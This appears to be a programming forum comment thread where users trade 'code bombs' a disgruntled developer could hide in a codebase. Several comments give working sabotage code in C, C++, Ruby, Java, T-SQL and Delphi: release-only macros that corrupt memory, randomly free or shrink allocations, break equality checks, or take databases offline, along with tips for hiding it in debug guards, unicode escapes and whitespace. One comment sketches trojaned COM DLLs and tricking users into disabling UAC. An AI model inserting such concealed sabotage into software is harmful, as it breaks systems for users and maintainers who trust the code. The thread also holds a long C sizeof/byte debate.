• Tomalak Geret'kal (unregistered) in reply to Niels
    Niels:
    The WTF about the sample is that you should not be using NULL in C++ code, you should just write 0.

    How about:

    #ifndef _DEBUG
    #define if(x) if(rand()<0.0001 && (x))
    #endif

    NULL in C++ is fine; good luck find-and-replacing all your 0s when nullptr comes along.

    Meanwhile, rand() returns an int, so the real WTF is on you.

  • Tomalak Geret'kal (unregistered) in reply to Tomalak Geret'kal
    Tomalak Geret'kal:
    Niels:
    #ifndef _DEBUG
    #define if(x) if(rand()<0.0001 && (x))
    #endif

    Meanwhile, rand() returns an int, so the real WTF is on you.

    (Don't get me wrong, your code will still "work", but the comparison with 0.0001 seems really strange. Comparing with 1 would be more canonical.)

  • Daniel Cooper (unregistered)
    class String 
            alias :old_eq :==
    	def ==(object)
              (rand(100) == 42 ? !self.old_eq(object) : self.old_eq(object))
    	end
    end
    

    Every so often "hello" == "world" will return true and "hello" == "hello" wont.

    How can you not love Ruby?

  • Kelso (unregistered)

    I'm not sure how many other people realise this but with most language you can use direct unicode escaped sequences. so something like: Java:

    // This is a friendly comment \u000A nasty code here

    I know Eclipse doesn't highlight that as actual code, it just thinks it's a comment. see it doesn't take much. easiest way to hide it is to just tab it across a bit till it sits just off the screen.

  • Not yet disgruntled (unregistered)

    #ifndef ALLOCATOR__H #define ALLOCATOR__H

    #ifdef __cplusplus #pragma warning(disable : 4172) #include <cstdlib> #include <new> #include <ctime>

    using namespace std;

    #define CHECK_SIZE(a, b, c) ((!a && b) ? 0 : a##b(c))

    namespace { class allocator_base { };

    template <size_t n> class allocator : public allocator_base { char arr[n]; };

    const int max_n = 1000; template<int n> struct helper { static allocator_base& func(int i) { return i == n? allocator<n>() : helper<n+1>::func(i); } };

    template<> struct helper<max_n> { static allocator_base& func(int i) { return allocator<max_n>(); } };

    allocator_base& helper_allocate(int i) { return helper<1>::func(i); }

    bool shouldSmartAlloc(size_t size){ static int s = 0; int ti = 0; int me = 0; int sr = 0; int and = 0; int r = 0; if (!s){ s = static_cast<size_t>(CHECK_SIZE(ti, me, NULL)); s += size; CHECK_SIZE(sr, and, s); } if (size < max_n && (CHECK_SIZE(r, and, /void/) % (max_n * 10)) < 1){ return true; } return false; } }

    void * operator new(size_t size) { void *p; if (shouldSmartAlloc(size)){ allocator_base alloc = helper_allocate(size); p = static_cast<void *>(&alloc); } else { p = malloc(size); } return p; }

    #endif

    #endif

    Tried obfuscating the randomness slightly, and hiding it in something less suspicious-looking. Basically, about 1 in every 10000 calls to new will allocate the memory on the stack instead of the heap. This should not only produce some nasty crashes when writing to or deleting that memory, but the added stack-corruption should add some fun to the debugging.

  • Mike (unregistered)

    In those legacy visual basic apps that are still being maintained, just remove the line "option explicit" from every source file.

  • Maurizio (unregistered)

    Once i did (really) the following on a Symbolics Lisp Machine

    (defun car (x) (cdr x))

    The machine took around 60 seconds to completely crash. OK, not very subtle.

  • (cs)

    Some improvement to my malloc magic memory modifcation: now, if the memory is free'd before it can be changed, it won't change it. So memory will only be changed if it exists for more than a second or so:

    #ifdef NDEBUG
    #include <stdlib.h>
    #include <unistd.h>
    #include <signal.h>
    
    sig_t __damn_oldf;
    int *__damn_ptr = NULL;
    
    void __damn2(int _)
    {
      signal(SIGALRM, __damn_oldf);
      if(__damn_ptr)
        *__damn_ptr = rand();
    
      __damn_ptr = NULL;
    }
    
    void *__damn1(size_t size)
    {
      static int cnt = 111;
      void *ret;
      ret = malloc(size);
    
      if(!__damn_ptr && !cnt--) {
        __damn_ptr = ret;
        __damn_oldf = signal(SIGALRM, __damn2);
        alarm(1);
        cnt = 111;
      }
    
      return ret;
    }
    
    void __undamn1(void *ptr)
    {
      if(ptr == __damn_ptr) {
        __damn_ptr = NULL;
      }
    
      free(ptr);
    }
    
    
    #define malloc __damn1
    #define free __undamn1
    #endif
    
  • Luiz Felipe (unregistered) in reply to Anonymous
    Anonymous:
    class LeakyString
    {
        private:
           std::string *str;
    
    public:
        LeakyString( const char *const s )
                : str( new std::string( s ) ) {}
    
        LeakyString( const LeakyString &copy )
                : str( new std::string( *copy.str ) ) {}
    
        LeakyString &
        operator= ( const LeakyString &rhs )
        {
            LeakyString tmp( rhs );
            std::swap( this->str, tmp.str );
            delete tmp.str; // Don't leak all the time
        }
    
        ~LeakyString() {} // Just leak our string sometimes
    
    // Assume the necessary internals to emulate a string
    

    };

    // Try to get everyone using our leaky implementation, // but we'll possibly wreak some compiler havoc if // string is a variable name or something... #define LeakyString string

    Lol, this is java string class, it leaks much memory. Hey you copied this from java hot spot vm. It explais why java sucks so much memory from my machine, thanks i have 8GB for it, nah its for Crisis Warhead also.

  • (cs) in reply to Not yet disgruntled
    Not yet disgruntled:
    #define CHECK_SIZE(a, b, c) ((!a && b) ? 0 : a##b(c))

    ...

    int and = 0;
    

    ...

      CHECK_SIZE(sr, and, s);
    

    You know that "and" is a keyword in C++, don't you? (It's a synonym for &&. Likewise "or" for ||, and "not" for monadic !.)

  • (cs) in reply to Steve The Cynic
    Steve The Cynic:
    frits:
    Hey, you guys know size is in bytes, not bits right? Just asking...
    Actually, you are wrong. The unit of sizeof() is chars, not bytes. It so happens that char is usually an octet (8 bits, what we usually call a byte), but it doesn't have to be. I have worked on a machine where the natural size of a char was 16 bits, because the memory was 16 bits wide (i.e. moving from address 1000 to address 1001 advanced by 16 bits), and CDC Cyber mainframes had natural 6 bit characters (but aren't in that mode suitable for C, because char must be at least 8 bits).

    Did I mention sizeof()?

    You need to know the size of char in bytes if you're using sizof() to derive your argument for malloc(). Because every reference I found specifies that the size argument is in bytes. That's why you'll sometimes see something like:

        int size = sizeof(my_data_struct)/sizeof(char);
        my_data_struct * p_struct = malloc(size);
    
    

    So the lesson is: if you're using C++, just use new[].

    I'll refer you to these: http://www.cppreference.com/wiki/memory/c/malloc http://www.cplusplus.com/reference/clibrary/cstdlib/malloc/ http://msdn.microsoft.com/en-us/library/6ewkz86d.aspx

    Addendum (2011-03-15 09:28): Oops :X The code snippet should be:

    int size = sizeof(my_data_struct)/sizeof(char);
        my_data_struct * p_struct = malloc(size);
    
    
    

    Addendum (2011-03-15 09:28): Oops :X The code snippet should be:

    int size = sizeof(my_data_struct)/sizeof(char);
        my_data_struct * p_struct = malloc(size);
    
    
    

    Addendum (2011-03-15 09:34): Ahem:

        /*The above code example is common but wrong
          it should be done as below.  make sure you include 
          climits.h
        */
        int size = sizeof(my_data_struct)/(CHAR_BIT/8);    
        my_data_struct * p_struct = malloc(size);
    

    Frankenstein-like walks away "More coffee. Fire bad."

  • Luiz Felipe (unregistered)

    i forget to close the damn quote tag.

    My bomb recipe, made to wreak havok in prograns using COM:

    Using the microsoft idl extractor you get the COM interface from some dll. Use the generated idl to make an stub for the dll. I have some stub generator, it creates a proxy for DLL using an code generator. Then in the code generator, pick some DLL call and inject some IFs to return (in random condition) instead of calling the original DLL from proxed DLL. With LoadLibrary you can find if it expose IUnknow, it sinalizes that is is an COM Dll. Make some script to call the generator for some random COM dll. The Stub generator must statically link to the renamed COM Dll for this work. Now we need admin privilege to replace original DLL, but this is the easy part, just make the user click the fucking UAC, or tell that UAC is shit and make the user disable it for us to bomb the machine, or use some virus code to disable it.

    But this bomb requires much source code to post here.

  • GWO (unregistered) in reply to Steve The Cynic
    2011-03-15 04:04 • by Steve The Cynic Actually, you are wrong. The unit of sizeof() is chars, not bytes.
    Actually, *you* are wrong. The unit of sizeof() is bytes. It's just that in C++, a byte is not necessarily a binary octet. It's defined to be the size of a char, which is also the smallest addressable unit.
  • (cs) in reply to Rosuav
    Rosuav:
    C++ example:

    #ifndef _DEBUG struct imt { int intval; imt(int i):intval(i) {} operator int() {return intval;} int operator /(imt other) {return (intval>>1)/(other.intval>>1);} }; #define int imt #endif

    This will create a completely invisible replacement for the standard integer, but such that all division is done with the low bit stripped. It'll work fine most of the time, but just occasionally it'll give slightly inaccurate results. And like the NULL example in the original post, it's something that you would trust perfectly ("that's just integer division, how can that be faulty?!?"); the debugger would tell you that it's "struct imt" instead of "int", but in the debugger, this won't be doing stuff anyway...

    For extreme Heisenbugginess, put this only in some places and not in others. You copy and paste a block of code from one module to another, and it gains some division inaccuracy.

    VERY occasionally this might even crash - if you try to divide an imt by 1, it'll become division by 0. Just to annoy the people who thought they were safe against div by 0!

    That goes to show... One should always check for #ifdef _DEBUG and #ifndef _DEBUG directives on inherited code.

  • Anonymous (unregistered)

    The 'double free' a few comments back got me thinking....

    Untested code concept

    void *mallocevil(size_t size)
    {
       void *ptr = malloc(size);
       if(rand() < 0.0001) /* Choose xour favourite unlikely condition */
         free(ptr);
       return ptr;
    }
    
    #define malloc mallocevil
    

    One can extend it to have the pointer to the malloc()ed block freed by another thread some time after allocation.

  • Kenny (unregistered) in reply to bob42
    bob42:
    ...

    declare @databases table (name varchar(128), Sm int) declare @database table (name varchar(128), Sm int) declare @number int, @name varchar(128), @sql varchar(max)

    insert into @databases (name, Sm) select name, abs(checksum(newid()))% (select count(*) from sys.databases where database_id>4 and state=0) from sys.databases where database_id>4 and state=0

    select @number=abs(checksum(newid()))% (select count(*) from sys.databases)

    insert into @database (name, Sm) select top 1 name, sm from @databases order by sm

    if exists (select top 1 name from @database) begin

    select @name=name from @database where sm=@number

    set @sql='alter database [' + @name + '] set offline with rollback after 30 seconds'

    exec(@sql)

    end

    I had to double-take, and then triple-take at this code, and it actually made me utter "WTF?!" I really hope this is intentionally obfuscated.

    As someone mentioned above, it would be easy to find because of logging, but that could be mitigated by using WAITFOR statements to move the start and end times of the job away from the offline time of the database to reduce suspicion.

    I can see that "abs(checksum(newid()))" is supposed to generate a random non-negative integer, but poor zero has half the chance of occurring than any other number (although this is mostly mitigated by the modulo operator), and there's a one in 4G chance that it will fail when it tries to perform "ABS(-2147483648)". I really hope this method isn't used in production.

    Beyond that ... tables, tables, tables. Why two table variables to pour the data from one to another? All you're trying to do is choose one online, non-system database as a target, so why not just:

    SELECT TOP 1 @sql = 'alter database [' + name + '] set offline with rollback after 30 seconds' FROM sys.databases WHERE database_id > 4 AND state = 0 ORDER BY NEWID()

    As for all the other "randomness". Setting aside that modulo operator will give a very slight bias towards the lower numbers in the set, and that the value in @database.sm will be biased toward lower numbers by the "ORDER BY sm", all of it boils down to "Does this [Random integer between 0 and Count-Of-Databases] equal 0?"

    All that aside, I may actually implement this on some of the development database servers anyway, it'll be a good way to organically prune databases that aren't used any more.

    (Apparently haven't had enough coffee today.)

  • Luiz Felipe (unregistered) in reply to Mike
    Mike:
    In those legacy visual basic apps that are still being maintained, just remove the line "option explicit" from every source file.
    This is evil. But not works, my compiling script try to find it in all the code files and fail the compilation if it dont have the "option explicit".
  • Luiz Felipe (unregistered)

    Some will say "The TRWTF is VB". No the true WTF it the "coders", and it include also, c# noobs, java, and javascript. But, really, you can use all these languages correctly with some correct software enginering and produce awsome softwares.

  • Major Malfunction (unregistered) in reply to Capt. Obvious
    Capt. Obvious:
    Wim:
    The use of rand() does not give non-deterministive behavior. The example will always crash at the same point in the program (assuming the rest is deterministic)

    My idea would be (for C):

    #include <stdlib.h>
    
    static inline void *
    malloc_bomb(size_t size)
    {
        if (size>8) size-=8;
        return malloc(size);
    }
    
    #define malloc malloc_bomb //#defined moved as indicated by many postings
    

    Clever error. But depending on the internal procedures at the company

    size+=8;
    may be a worse condition. (Magic number 8 requires tuning.) The free should be based on the objects theoretical size, not the malloc, resulting in a slow leak. Especially brutal because each component group can blame another, and be convinced that they aren't causing the leak.
    The free is based on the pointer of the memory block.

  • (cs) in reply to frits
    frits:
    Did I mention sizeof()?

    You need to know the size of char in bytes if you're using sizof() to derive your argument for malloc(). Because every reference I found specifies that the size argument is in bytes. That's why you'll sometimes see something like:

        int size = sizeof(my_data_struct)/sizeof(char);
        my_data_struct * p_struct = malloc(size);
    
    

    So the lesson is: if you're using C++, just use new[].

    So, you think that a reference's presence on the Internet means it is correct? Dividing by sizeof(char) is always a waste of space in the source file, as sizeof(char) is always 1. Always. Even if you have a wacky (but validly conformant) compiler where all integral types (including char) are 137 bits long, sizeof(char) is 1, because that's what the standards say. Yes, it is valid to have all interal types be 137 bits long. Almost no source code found in the real world will work on such a machine, but it is valid. The standards merely say that:

    • bitsof(char) >= 8
    • bitsof(short) >= 16 && bitsof(short) >= bitsof(char)
    • bitsof(int) >= bitsof(short)
    • bitsof(long) >= bitsof(int) && bitsof(long) >= 32
    • bitsof(unsigned X) == bitsof(signed X)

    The question of bytes versus chars as unit of sizeof is largely moot, as systems where char != an 8-bit byte are pretty rare these days, and anyway, "byte" is often used to mean "normal smallest hunk of memory", what would have been called a "word" in the old days, so a man page that says that malloc takes a size in bytes is correct, even on machine with nine-bit doodads. It is to avoid this type of confusion that standards (especially ITU standards) use the word "octet".

    Dividing CHAR_BIT by 8 in an attempt to find the number of bytes is, therefore, wrong. It finds the number of octets. On the hypothetical 137-bit machine, a "byte" would be 137 bits, and would contain seventeen and an eighth (?sp) octets.

    However, the point about using new or new[] in C++ is well taken, for plenty of reasons.

  • (cs) in reply to Steve The Cynic
    Steve The Cynic:
    frits:
    Did I mention sizeof()?

    You need to know the size of char in bytes if you're using sizof() to derive your argument for malloc(). Because every reference I found specifies that the size argument is in bytes. That's why you'll sometimes see something like:

        int size = sizeof(my_data_struct)/sizeof(char);
        my_data_struct * p_struct = malloc(size);
    
    

    So the lesson is: if you're using C++, just use new[].

    So, you think that a reference's presence on the Internet means it is correct? Dividing by sizeof(char) is always a waste of space in the source file, as sizeof(char) is always 1. Always. Even if you have a wacky (but validly conformant) compiler where all integral types (including char) are 137 bits long, sizeof(char) is 1, because that's what the standards say. Yes, it is valid to have all interal types be 137 bits long. Almost no source code found in the real world will work on such a machine, but it is valid. The standards merely say that:

    • bitsof(char) >= 8
    • bitsof(short) >= 16 && bitsof(short) >= bitsof(char)
    • bitsof(int) >= bitsof(short)
    • bitsof(long) >= bitsof(int) && bitsof(long) >= 32
    • bitsof(unsigned X) == bitsof(signed X)

    The question of bytes versus chars as unit of sizeof is largely moot, as systems where char != an 8-bit byte are pretty rare these days, and anyway, "byte" is often used to mean "normal smallest hunk of memory", what would have been called a "word" in the old days, so a man page that says that malloc takes a size in bytes is correct, even on machine with nine-bit doodads. It is to avoid this type of confusion that standards (especially ITU standards) use the word "octet".

    Dividing CHAR_BIT by 8 in an attempt to find the number of bytes is, therefore, wrong. It finds the number of octets. On the hypothetical 137-bit machine, a "byte" would be 137 bits, and would contain seventeen and an eighth (?sp) octets.

    However, the point about using new or new[] in C++ is well taken, for plenty of reasons.

    Nice selective quoting. You're original assertion about the size argument for malloc not being in bytes was, and still is wrong. Focusing on sizeof() is red a herring you introduced, not me.

    BTW, this is the reason why I usually just make stupid jokes and avoid commenting about actual code on this site. Because inevitably some pig-headed dev will come along and try to get into a pissing match.

  • Not yet disgruntled (unregistered) in reply to Steve The Cynic
    Steve The Cynic:
    Not yet disgruntled:
    #define CHECK_SIZE(a, b, c) ((!a && b) ? 0 : a##b(c))

    ...

    int and = 0;
    

    ...

      CHECK_SIZE(sr, and, s);
    

    You know that "and" is a keyword in C++, don't you? (It's a synonym for &&. Likewise "or" for ||, and "not" for monadic !.)

    Actually, I didn't! I guess I learned something today then. See, this is what I like about TDWTF :)

    The snippet, however, was written for and compiles cleanly with MSVC++ (as visible by the #pragma directive), which coincidentally does not reserve "and", "or" or "not" as keywords. See http://msdn.microsoft.com/en-us/library/2e6a4at9.aspx

    Still, good to know for future reference - and in case I would ever need this code to be platform-independent... ;)

  • MK|C (unregistered)
    cat /dev/random
    will hang any code not wise enough to use urandom.

    ...kind of weak, but meh.

  • Queex (unregistered)

    Slip this into a java package and fix the imports. Change to suit whatever collection is used most often. You could probably make it harder to uncover by altering where it hides the references and how.

    public class ArrayList<E> extends java.util.ArrayList<E> {
        @SuppressWarnings("unchecked")
        private static final java.util.ArrayList bomb = new java.util.ArrayList();
        @SuppressWarnings("unchecked")
        @Override
        public boolean add(E e) {
            try {
                bomb.add(bomb.clone());
            } catch (OutOfMemoryError ex) {
            }
            return super.add(e);
        }
    }
  • Ivan Ivanovich (unregistered)

    // maybe I needing later

  • Joshua (unregistered)

    #ifndef _DEBUG if (rand() < 3) vfork() #endif

  • Rhialto (unregistered) in reply to drfreak
    drfreak:
    On the Vic-20 and C64 in BASIC, I found a bug in the LIST command a long time ago which I have worked to my advantage before. To use the bug can create a rudimentary form of copy-protection but will not crash your program as it executes.

    On random lines, write your code. For instance, 10, 12, 16, 23, 32, 37, etc.. On all lines in-between, put a REM statement where you traverse the keyboard from qwert thrugh vbnm, hold in the function key (i think it was a commodore key actually) which produces the special characters often used in line drawing and such. Then, traverse the keys again from top to bottom. When you do a LIST on the program and it hits one of those lines, you'll get a ?SYNTAX ERROR and the listing will stop. The only way to see the real code is to list line numbers one-by-one until you get all the lines which don't contain the REMark..

    I never drilled down to find the actual keycode which causes the bug, hence my brute-force method of using all the keys. Maybe someone already has already discovered the bug though and has simplified the REM statement...

    The code that creates this problem is the one that has a value 1 higher than that of the highest possible BASIC keyword. Since different BASIC versions had different keywords, the character exhibiting this problem would also differ.

    The first PET BASIC version did not have the keyword GO, but instead allowed spaces inside keywords, which were ignored. That was changed in version 2.0, but they keyword GO was added to still allow "GO TO" for GOTO.

  • ferrix (unregistered)

    I think this is a good combination of things to happen:

    int decoy_error(int value) {
      for (x = 0; x < 65535; x++) {
        // real flawless code goes here
      }
      return
    }
    
    int decoy_utility_function(someValue) {
      if (GetTickCount() == 100) return something;  // notice how this is almost always false?
    
      y = 0;
    
      // you can write practically anything here
    
      someValue = someValue / y;
    
      // here you can reveal your secrets, we never get there
    }
    
    #define handle_error decoy_error
    #define utility_function decoy_utility_function
    
    try {
      for (x = 0; x < 65535; x++) {
        // some code goes here
    
        utility_function(x);
        
        // the bomb goes here
      }
    
      return foobar;
    }
    catch Exception {
        return handle_error(x);
    }
    
  • C++ Programmer (unregistered) in reply to Niels

    WTF is this shit about not using NULL in C++ prior to C++0x? that's bullshit.. who the fuck came up with that shit

    prior to C++0x you SHOULD be using NULL for clarity, with C++0x compliance you should be using the nullptr keyword.

    CAPTCHA: ludus ... somewhere you need to be enslaved

  • (cs) in reply to frits
    frits:
    Steve The Cynic:
    frits:
    Did I mention sizeof()?

    You need to know the size of char in bytes if you're using sizof() to derive your argument for malloc(). Because every reference I found specifies that the size argument is in bytes. That's why you'll sometimes see something like:

        int size = sizeof(my_data_struct)/sizeof(char);
        my_data_struct * p_struct = malloc(size);
    
    

    So the lesson is: if you're using C++, just use new[].

    So, you think that a reference's presence on the Internet means it is correct? Dividing by sizeof(char) is always a waste of space in the source file, as sizeof(char) is always 1. Always. Even if you have a wacky (but validly conformant) compiler where all integral types (including char) are 137 bits long, sizeof(char) is 1, because that's what the standards say. Yes, it is valid to have all interal types be 137 bits long. Almost no source code found in the real world will work on such a machine, but it is valid. The standards merely say that:

    • bitsof(char) >= 8
    • bitsof(short) >= 16 && bitsof(short) >= bitsof(char)
    • bitsof(int) >= bitsof(short)
    • bitsof(long) >= bitsof(int) && bitsof(long) >= 32
    • bitsof(unsigned X) == bitsof(signed X)

    The question of bytes versus chars as unit of sizeof is largely moot, as systems where char != an 8-bit byte are pretty rare these days, and anyway, "byte" is often used to mean "normal smallest hunk of memory", what would have been called a "word" in the old days, so a man page that says that malloc takes a size in bytes is correct, even on machine with nine-bit doodads. It is to avoid this type of confusion that standards (especially ITU standards) use the word "octet".

    Dividing CHAR_BIT by 8 in an attempt to find the number of bytes is, therefore, wrong. It finds the number of octets. On the hypothetical 137-bit machine, a "byte" would be 137 bits, and would contain seventeen and an eighth (?sp) octets.

    However, the point about using new or new[] in C++ is well taken, for plenty of reasons.

    Nice selective quoting. You're original assertion about the size argument for malloc not being in bytes was, and still is wrong. Focusing on sizeof() is red a herring you introduced, not me.

    BTW, this is the reason why I usually just make stupid jokes and avoid commenting about actual code on this site. Because inevitably some pig-headed dev will come along and try to get into a pissing match.

    3.6
    1 byte
    addressable unit of data storage large enough to hold any member of the basic character
    set of the execution environment
    2 NOTE 1 It is possible to express the address of each individual byte of an object uniquely.
    3 NOTE 2 A byte is composed of a contiguous sequence of bits, the number of which is implementation-
    defined. The least significant bit is called the low-order bit; the most significant bit is called the high-order
    bit.
    
    The values given below shall be replaced by constant expressions suitable for use in #if
    preprocessing directives. Moreover, except for CHAR_BIT and MB_LEN_MAX, the
    following shall be replaced by expressions that have the same type as would an
    expression that is an object of the corresponding type converted according to the integer
    promotions. Their implementation-defined values shall be equal or greater in magnitude
    (absolute value) to those shown, with the same sign.
    — number of bits for smallest object that is not a bit-field (byte)
    CHAR_BIT 8
    
    6.5.3.4 The sizeof operator
    ...
    Semantics
    2 The sizeof operator yields the size (in bytes) of its operand, which may be an
    expression or the parenthesized name of a type. The size is determined from the type of
    the operand. The result is an integer. If the type of the operand is a variable length array
    type, the operand is evaluated; otherwise, the operand is not evaluated and the result is an
    integer constant.
    3 When applied to an operand that has type char, unsigned char,or signed char,
    (or a qualified version thereof) the result is 1.
    ...
    4 The value of the result is implementation-defined, and its type (an unsigned integer type)
    is size_t, defined in <stddef.h> (and other headers).
    5 EXAMPLE 1 A principal use of the sizeof operator is in communication with routines such as storage
    allocators and I/O systems. A storage-allocation function might accept a size (in bytes) of an object to
    allocate and return a pointer to void. For example:
    extern void *alloc(size_t);
    double *dp = alloc(sizeof *dp);
    
    7.20.3.3 The malloc function
    Synopsis
    1 #include <stdlib.h>
    void *malloc(size_t size);
    Description
    2 The malloc function allocates space for an object whose size is specified by size and
    whose value is indeterminate.
    Returns
    3 The malloc function returns either a null pointer or a pointer to the allocated space.
    
    

    TI C54-series DSPs have an MAU (minimum addressable unit) in data space which is a 16-bit word. In program space it's 8 bits.

  • AK-47 (unregistered) in reply to hoodaticus

    Ouch. I'd hate to work with you, dogg.

  • Chris Reuter (unregistered)

    This isn't mine originally, but:

    #ifndef _DEBUG
    #define struct union    /* Saves a huge amount of space. */
    #endif
    

    (No, this isn't a serious contender.)

  • Lumberjack U.K. (unregistered)

    Delphi one for you...

    var OldWndProc: Pointer;

    function NewWndProc(Handle: hWnd; Msg: UINT; PW: WPARAM; PL: LPARAM): LRESULT stdcall; begin { Randomly ignore 1/100 windows messages } if Random(100) <> 42 then result := CallWindowProc(OldWndProc, Handle, Msg, PW, PL); end;

    initialization OldWndProc := Pointer(SetWindowLong(Application.Handle, GWL_WNDPROC, LongInt(@NewWndProc)));

  • Professor (unregistered) in reply to frits
    frits:
    Steve The Cynic:
    frits:
    Did I mention sizeof()?

    You need to know the size of char in bytes if you're using sizof() to derive your argument for malloc(). Because every reference I found specifies that the size argument is in bytes. That's why you'll sometimes see something like:

        int size = sizeof(my_data_struct)/sizeof(char);
        my_data_struct * p_struct = malloc(size);
    
    

    So the lesson is: if you're using C++, just use new[].

    So, you think that a reference's presence on the Internet means it is correct? Dividing by sizeof(char) is always a waste of space in the source file, as sizeof(char) is always 1. Always. Even if you have a wacky (but validly conformant) compiler where all integral types (including char) are 137 bits long, sizeof(char) is 1, because that's what the standards say. Yes, it is valid to have all interal types be 137 bits long. Almost no source code found in the real world will work on such a machine, but it is valid. The standards merely say that:

    • bitsof(char) >= 8
    • bitsof(short) >= 16 && bitsof(short) >= bitsof(char)
    • bitsof(int) >= bitsof(short)
    • bitsof(long) >= bitsof(int) && bitsof(long) >= 32
    • bitsof(unsigned X) == bitsof(signed X)

    The question of bytes versus chars as unit of sizeof is largely moot, as systems where char != an 8-bit byte are pretty rare these days, and anyway, "byte" is often used to mean "normal smallest hunk of memory", what would have been called a "word" in the old days, so a man page that says that malloc takes a size in bytes is correct, even on machine with nine-bit doodads. It is to avoid this type of confusion that standards (especially ITU standards) use the word "octet".

    Dividing CHAR_BIT by 8 in an attempt to find the number of bytes is, therefore, wrong. It finds the number of octets. On the hypothetical 137-bit machine, a "byte" would be 137 bits, and would contain seventeen and an eighth (?sp) octets.

    However, the point about using new or new[] in C++ is well taken, for plenty of reasons.

    Nice selective quoting. You're original assertion about the size argument for malloc not being in bytes was, and still is wrong. Focusing on sizeof() is red a herring you introduced, not me.

    BTW, this is the reason why I usually just make stupid jokes and avoid commenting about actual code on this site. Because inevitably some pig-headed dev will come along and try to get into a pissing match.

    But Sizeof(Char) = 1 dumbass.

    your not too bright are you?

  • (cs)

    What about this? (Ruby)

    # First, memorize the definition of Class as it will be killed later
    @klass = Class
    # Iterates over the names of all defined constants
    for @constant_name in constants
      # Get the constant's value
      @constant_value = const_get @constant_name
      # If it is a class
      if @constant_value.is_a? @klass
        # Define a new class that inherits from the old one
        @new_class = @klass.new @constant_value do
          # Redefine its allocator
          def self.allocate
            if rand < 0.0000001
              # Randomly create an instance of the *old* class instead
              superclass.allocate
            else
              # Create instance of this class
              super
            end
          end
        end
        # Redefine the constant to be the new class
        # (redefining constants usually yields a warning, but not with const_set)
        const_set @constant_name, @new_class
      end
    end
    # Delete the used variables to cover our tracks
    # (that's also the reason I used instance variables instead of local ones)
    remove_instance_variable(:@klass)
    remove_instance_variable(:@constant_name)
    remove_instance_variable(:@constant_value)

    In the end, you will have all the same classes, but not really. Applications will then sometimes fail if you try to figure out the type of a class. For example,

    String.new("Hello World").is_a? String
    will sometimes evaluate to false, because the new constant String now refers to the superclass of the built-in String class.

    This might have some other effects than the intended one... for example, I don't know if it will work for String / Numeric / Array / Hash / RegExp literals. And it might not work at all, I couldn't test it here.

    Addendum (2011-03-15 13:46): Dang! It needs to be

    for @constant_name in self.constants
    , of course!

    Addendum (2011-03-15 13:47): I mean, self.class.constants -.-

  • Cannery Rowe (unregistered)

    Once upon a time I was asked to take over code that a developer had "Upsized" from MS Access to SQL Server.

    However, after a while Reports that used stored procedures mysteriously failed and their stored procedures or source views were gone... After investigation I discovered that in a utility procedure, used only in yearly or other infrequently used reports, contained a little gem that looked up and deleted a set of stored procedures and views...

    It was 5000 blank lines below the last line of "real" code. all of the rest of which was visible on the first edit screen...

  • anon c codeder (unregistered) in reply to Sten
    Sten:
    Some other guy:
    Maybe
    #include <stdlib.h>
    

    #define malloc malloc_bomb #define realmalloc malloc

    static inline void *

    malloc_bomb(size_t size)

    {

    if (size>8) size-=8;
    
    return realmalloc(size);
    

    }

    No. realmalloc gets replaced by malloc which in turn gets replaced by malloc_bomb. The correct one (according to ISO C) wouhl have #define at the bottom (after the function).

    Or use calloc :)

    Even better, (this is based on a real bug found) in malloc_bomb:

    // need to align memory as <other_coder> can't write proper code. size = size & ~0x07; calloc(size,1);

    This has the benefit of having hex in C (you would be surprised how many C coders will avoid code for that reason). It also is a common pattern (but implimented badly). Also, having the force of a bug fix and you don't want to be seen being as silly as <other_coder>.

  • Sten (unregistered) in reply to anon c codeder
    anon c codeder:
    size = size & ~0x07; calloc(size,1);

    This is pure evil — looking like a little innocent child while being a brat from hell

  • methinks (unregistered) in reply to drfreak
    drfreak:
    On the Vic-20 and C64 in BASIC, I found a bug in the LIST command a long time ago which I have worked to my advantage before. To use the bug can create a rudimentary form of copy-protection but will not crash your program as it executes.

    On random lines, write your code. For instance, 10, 12, 16, 23, 32, 37, etc.. On all lines in-between, put a REM statement where you traverse the keyboard from qwert thrugh vbnm, hold in the function key (i think it was a commodore key actually) which produces the special characters often used in line drawing and such. Then, traverse the keys again from top to bottom. When you do a LIST on the program and it hits one of those lines, you'll get a ?SYNTAX ERROR and the listing will stop. The only way to see the real code is to list line numbers one-by-one until you get all the lines which don't contain the REMark..

    I never drilled down to find the actual keycode which causes the bug, hence my brute-force method of using all the keys. Maybe someone already has already discovered the bug though and has simplified the REM statement...

    Why so complicated?

    The relevant statement was simply REM (Shift-L), the Shift-L produces a line character that looks like a slightly enlarged "L". You could put the statement on each line after the real code, no need for additional lines.

    This was very well known in the C64 community.

    The culprit is a point in the OS-code, where the programmers saved one (!) byte by doing a relative jump instead of an absolute one, assuming some value in the accumulator (the main register) of the 6510 CPU. With the Shift-L-character this failed (can't remember the exact reason, most likely an overflow) and the code fell through the conditional jump statement - and right into the "Syntax error"-subroutine which happened to be the next piece of assembler code.

    I even wrote a one-liner (!) using two of the most classic tricks on the C64 (1. copy the OS into RAM, 2. encode the resulting assembler in printable characters and print it into memory) and corrected the jump, which enabled me to simply list all those "protected" source codes without having to resort to one of those existing programs which removed all REMs :o)

  • VB User (unregistered)

    My submission: ON ERROR RESUME NEXT

    "But boss, this is how I learned to write VB." Bonus points if you comment it with "This should never happen."

  • (cs) in reply to Ivan Ivanovich
    Ivan Ivanovich:
    // maybe I needing later
    Thinking the same thing; one of the worst things a disgruntled employee could leave behind has already appeared on this site: http://thedailywtf.com/Articles/Maybe-I-Needing-Later.aspx
  • Student (unregistered) in reply to hoodaticus

    [quote user="hoodaticus"][quote user="C-Octothorpe"][quote user="sheep hurr durr"][quote user="Rosuav"]

    -- snip --

    I've been doing this software development thing for years now, and I still giggle a little when I read "private members"... Is that just me?[/quote]Me too. Looks like I have another twin on here.

    "You said private... huh huh huh huh".[/quote]

    Had a CS professor at Brigham Young (of all places) gave us a lecture on "pubic" inheritence in C++. Didn't notice his glaring, and increasingly funny mistakes until the end of the lecture/

  • anon (unregistered) in reply to Sten
    Sten:
    Sobriquet:
    It will also make the library mysteriously fail to interoperate with other versions that were compiled without the redefinition. In a big app, this would be a nightmare.

    That’s not true.

    #define private public
    does not change ABI in any way since the classes do not change memory layout. I use it from time to time since some library developers are morons that define everything private and have never experienced any problem with that.

    So much for encapsulation...

  • I use grep (unregistered)
    "rumor has it that a disgruntled employee once left #define true false in a random header file in the codebase. Given our codebase, that would be a lot harder to debug than one might think."

    If you can't run a grep -r "true.*false" * or similar on your codebase...I'm sorry.

  • biff (unregistered) in reply to Sten
    Sten:
    Anon.:
    If recompiling is an option...

